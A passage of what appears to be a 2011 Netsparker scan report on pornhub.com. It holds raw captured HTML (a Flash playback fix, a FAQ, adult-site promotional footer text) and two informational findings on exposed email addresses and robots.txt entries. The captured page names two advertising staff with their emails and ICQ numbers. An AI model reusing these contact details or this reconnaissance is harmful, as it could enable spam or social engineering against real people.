<p>
If you are experiencing either of the following problems:
<ul class="bullet">
<li>
<strong>Black Square</strong><br>
Users see a black square where the video player should be, this means the Flash file does not load properly.
</li>
<li>
<strong>Double video frame</strong><br>
Users see the video playing in double, with a green line splitting the player in half horizontally.
</li>
</ul>
<p>
These may be caused because you have updated your Flash recently and Adobe has been modifying how their Flash
player handles video playback (it may have automatically updated for you, or you told it to update when prompted)
you may be experiencing issues regarding video playback. Following the steps below should fix it for most
users. In order to resolve the problem, please turn off hardware acceleration of your Flash player. To do
so, please follow these very simple steps:
</p>
<ol>
<li>
Right click on any Flash animation on your browser.<br>
<strong>Please note:</strong> If you are having the "black square" problem, please try another Flash file!<br>
<img src="http://cdn1.static.pornhub.phncdn.com/images/flash10bug-1.png" />
</li>
<li>Next, click the "Settings..." line.</li>
<li>
The Flash settings dialog box should show up, as seen below:<br>
<img src="http://cdn1.static.pornhub.phncdn.com/images/flash10bug-2.png" />
</li>
<li>Uncheck the "Enable hardware acceleration" checkbox.</li>
<li>Click "Close".</li>
<li>Clear your cache, close your browser and try viewing our videos again.</li>
</ol>
</div>
</div>
<div class="section_bar">
<div class="section_title_lc png"></div>
<h4 class="section_title">How To Roll Back Your Flash Player To 10.1</h4>
<div class="section_title_rc png"></div>
<div class="videos_wrapper">
<p>
If disabling Flash Hardware Acceleration (above) doesn't resolve the problems for you, rolling back to 10.1
seems to be a workaround for now, at least on Windows machines. In the steps below, the download of version
10.1 has Mac files for the installer.
<br><br>
To fix this, roll back to version 10.1.102.64, using the following steps:
<br><br>
<strong>Uninstall the current Flash player:</strong>
</p>
<ol>
<li>Go here: <a href="http://kb2.adobe.com/cps/141/tn_14157.html">http://kb2.adobe.com/cps/141/tn_14157.html</a></li>
<li>Look for the uninstall_flash_player link and download it.</li>
<li>Close all browser windows.</li>
<li>Run the uninstaller.</li>
</ol>
<p style="font-weight:bold;">Install the previous version of the Flash player:</p>
<ol>
<li>Go here: <a href="http://kb2.adobe.com/cps/142/tn_14266.html">http://kb2.adobe.com/cps/142/tn_14266.html</a></li>
<li>Download version 10.1.102.64 .</li>
<li>Close all browser windows.</li>
<li>Unzip the files.</li>
<li>In the extracted folder, open the folder "Flash Player 10.1.102.64" .</li>
<li>Open the folder "10_1r102_64" .</li>
<li>For windows users, the file flashplayer10_1r1102_64_win.exe is the one you want. Double-click to
execute it and launch the installer.</li>
</ol>
<p>After installing version 10.1.102.64, videos should once again display properly.</p>
</div>
</div><!--closes section_wrapper--> <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script> <script type="text/javascript"> var bodyHeight = parseInt($j("body").css("height")); var boxThWidth = parseInt($j("#boxThSel").css("width")); var windowWidth, boxFade, marginValue; function fadeObject (elementFade , value) { $j(elementFade).animate({ opacity: value }, 1000 ); } function ignoreCloseThAlert(cookieName) { setCookie(cookieName, 1); fadeOut('#boxThSel' , 0); fadeOut('#bkg-container' , 0); $j("#boxThSel").css("display" , "none"); $j("#bkg-container").css("display" , "none"); } function fadeOut(boxToFade , numberValue) { fadeObject (boxToFade , numberValue); return false; } function positionBox(marginValue) { if($j(window).width() > 965 ){ windowWidth = $j(window).width(); //$j("#boxThSel").css("left", (windowWidth /2 ) - (boxThWidth - marginValue) + "px"); } } $j(document).ready(function (){ $j("#bkg-container").css("height" , bodyHeight + "px"); }); try { var pageTracker = _gat._getTracker("UA-2623535-1"); pageTracker._setDomainName(".pornhub.com"); pageTracker._setAllowHash(false); pageTracker._setSampleRate("10"); pageTracker._trackPageview(); pageTracker._trackPageLoadTime(); } catch(err) {} </script> <div style="clear:both;"> <p class="footer"> The PornHub team is always updating and adding more porn videos every day. It's all here and 100% free porn. We have a huge free DVD selection that you can download or stream. PornHub is the most complete and revolutionary porn tube site. We offer streaming porn videos, downloadable DVDs, photo albums, and the number 1 free sex community on the net. We&rsquo;re always working towards adding more features that will keep your porno addiction alive and well. Send us feedback if you have any questions/comments. 
</p> <p class="footer"> Pornhub.com, 2011 &middot; <a href="/information#faq" rel="nofollow">FAQ</a> &middot; <a href="/information#terms" rel="nofollow">terms and conditions</a> &middot; <a href="/information#privacy" rel="nofollow">privacy policy</a> &middot; <a href="/information#dmca" rel="nofollow">DMCA</a> &middot; <a href="/information#btn-2257" rel="nofollow">2257</a> &middot; <a href="/webmasters" rel="nofollow">Webmasters</a> &middot; ..
E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam e-mail engines and brute-force tools. Furthermore, valid e-mail addresses may lead to social engineering attacks.

Remedy

Use generic e-mail addresses such as contact@ or info@ for general communications, and remove user- or person-specific e-mail addresses from the web site. Should this be required, use submission forms for this purpose.

External References

- /information

/information

http://www.pornhub.com/information

Found E-mails

Request

GET /information HTTP/1.1
Referer: http://www.pornhub.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:08:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 18732
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>Free Porn Videos &amp; Sex Movies - Porno, XXX, Porn Tube and Pussy Porn</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 
'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" 
style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/information" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 
'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/information" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/information" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/information" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/information" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/information" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/information" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 
'Categories Tab');">Categories</a></li> <li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div class="section_wrapper" id="feedback">
<div class="tabmenu">
<ul>
<li class="advertising"><a href="/information#advertising" rel="nofollow" class="active">Advertising</a></li>
<li class="faq"><a href="/information#faq" rel="nofollow">FAQ</a></li>
<li class="terms"><a href="/information#terms" rel="nofollow">Terms and Conditions</a></li>
<li class="privacy"><a href="/information#privacy" rel="nofollow">Privacy Policy</a></li>
<li class="dmca"><a href="/information#dmca" rel="nofollow">DMCA</a></li>
<li class="btn-2257"><a href="/information#btn-2257" rel="nofollow">2257</a></li>
<li class="webmaster"><a href="/webmasters" rel="nofollow">Webmasters</a></li>
<li class="partner"><a href="/information#partner" rel="nofollow">Content Partner Program</a></li>
</ul>
<div style="clear:both;"></div>
</div>
<div class="section_bar faq-cont">
<div class="section_title_lc png"></div>
<h4 class="section_title">Having Video Problems?</h4>
<div class="section_title_rc png"></div>
<div class="videos_wrapper">
<p>
Many of our users who have recently updated their Flash have reported issues regarding video playback, either seeing a black square where the video
player should be OR seeing the video playing in double, with a green line splitting the player in half horizontally. The problem should be resolved
for most users by following a few quick steps <a href="/front/flash10bug">HERE</a>.
</p>
</div>
</div>
<div class="section_bar advertising-cont">
<div class="section_title_lc png"></div>
<h4 class="section_title">Pornhub Advertising</h4>
<div class="section_title_rc png"></div>

<div class="videos_wrapper">

<div class="right"><a href="http://www.trafficjunky.net" rel="nofollow"><img src="http://cdn1.static.pornhub.phncdn.com/images/traffic-junky-logo.gif"></a></div>
<p class="last">If you would like to book a spot on Pornhub, please visit <a href="http://www.trafficjunky.net" rel="nofollow">www.trafficjunky.net</a></p>
<p><strong>Email:</strong> diana [at] trafficjunky.net or karll [at] trafficjunky.net</p>
<p>
<strong>ICQ:</strong> 433156868 - Karll<br/>
<strong>ICQ:</strong> 489070668 - Diana<br/>
</p>

</div> </div>
<div class="section_bar faq-cont" style="display:none;">
<div class="section_title_lc png"></div>
<h4 class="section_title">Pornhub FAQ</h4>
<div class="section_title_rc png"></div>

<div class="videos_wrapper">

<br /><p><strong><font color="#4fb2dc">Ok, so what's this PornHub thing all about?</font></strong><br />
PornHub is a community of people who all have one thing in common, their love of great porn! On PornHub you can post your favorite videos, watch videos that other users have posted, meet other like-minded individuals and discuss what's great (or what you'd love to change) about porn from all eras.</p>

<p><strong><font color="#4fb2dc">Sounds great, but how much does it cost?</font></strong><br />
PornHub is completely free of charge! PornHub won't charge you anything to watch as many videos as you like, upload your own videos or participate in our community. As long as you're happy, PornHub is happy.</p>

<p><strong><font color="#4fb2dc">Help! The videos don't play at all! What do I do?</font></strong><br />
To make sure that we provide only the highest possible quality videos, you will need to download Flash 9.0 (or higher) to view videos. If you don't yet have Flash 9.0, you can download it <a href="http://get.adobe.com/de/flashplayer/" rel="nofollow" target="_blank">here</a>. If you already have Flash 9.0 and still can't watch the videos, please <a href="/support" rel="nofollow">send us an email</a> and we'll be happy to look into it for you!</p>

<p><strong><font color="#4fb2dc">How do I cancel my Premium Membership?</font></strong><br />
To cancel your Premium Membership please click <a href="http://movieboxsupport.com/?action=cancel" rel="nofollow">here</a> and follow the provided instructions.</p>

<p><strong><font color="#4fb2dc">I see that you have a members area. Why should I become a member of PornHub?</font></strong><br />
While anyone can watch the videos that the community is sharing on PornHub, only members receive the full spectrum of features that are available to the community. Upload videos, post comments, rate videos, and fully participate in the PornHub experience. You can even store your favorite videos on your very own member's page, browse other member's profiles, send them messages and see what other members are watching and talking about! Click <a href="/signup" rel="nofollow">here</a> to get started!</p>

<p><strong><font color="#4fb2dc">How much does it cost to become a member?</font></strong><br />
Nothing! Becoming a basic member of PornHub is absolutely free. All it requires is that you choose a unique name for yourself and provide a valid email address. Once you've signed up, you're ready to fully participate in the PornHub community. Upload your favorite videos, interact with other members, rate videos and start growing your reputation as a Porn King! You can start your membership experience by clicking <a href="/signup" rel="nofollow">here</a>.</p>

<p><strong><font color="#4fb2dc">How do I upload a video to PornHub?</font></strong><br />
Once you've become a member, simply choose "upload video" from the main page, or follow this <a href="/upload" rel="nofollow">link</a> to share your video with the community.</p>

<p><strong><font color="#4fb2dc">What are "tags"?</font></strong><br />
When uploading a video, we ask that you include at least a few tags that describe your video and that will make it easier for the commu..
Robots.txt Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified a Robots.txt file with potentially sensitive content.

Impact

Depending on the content of the file, an attacker might discover hidden directories. Ensure that you have nothing sensitive exposed within this folder, such as the path of the administration panel.

Remedy

- /robots.txt

/robots.txt CONFIRMED

http://www.pornhub.com/robots.txt

Interesting Robots.txt Entries

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:08:26 GMT
Server: Apache
Last-Modified: Thu, 14 Apr 2011 19:33:56 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 152
Content-Type: text/plain


User-agent: *
Sitemap: http://www.pornhub.com/sitemaps.xml
disallow: *embed_player*
disallow: *watch_player*
disallow: *video_related*
disallow: /users/
disallow: /photo/
disallow: /album/
disallow: *page*page*
disallow: *search*page*
disallow: *search*o=*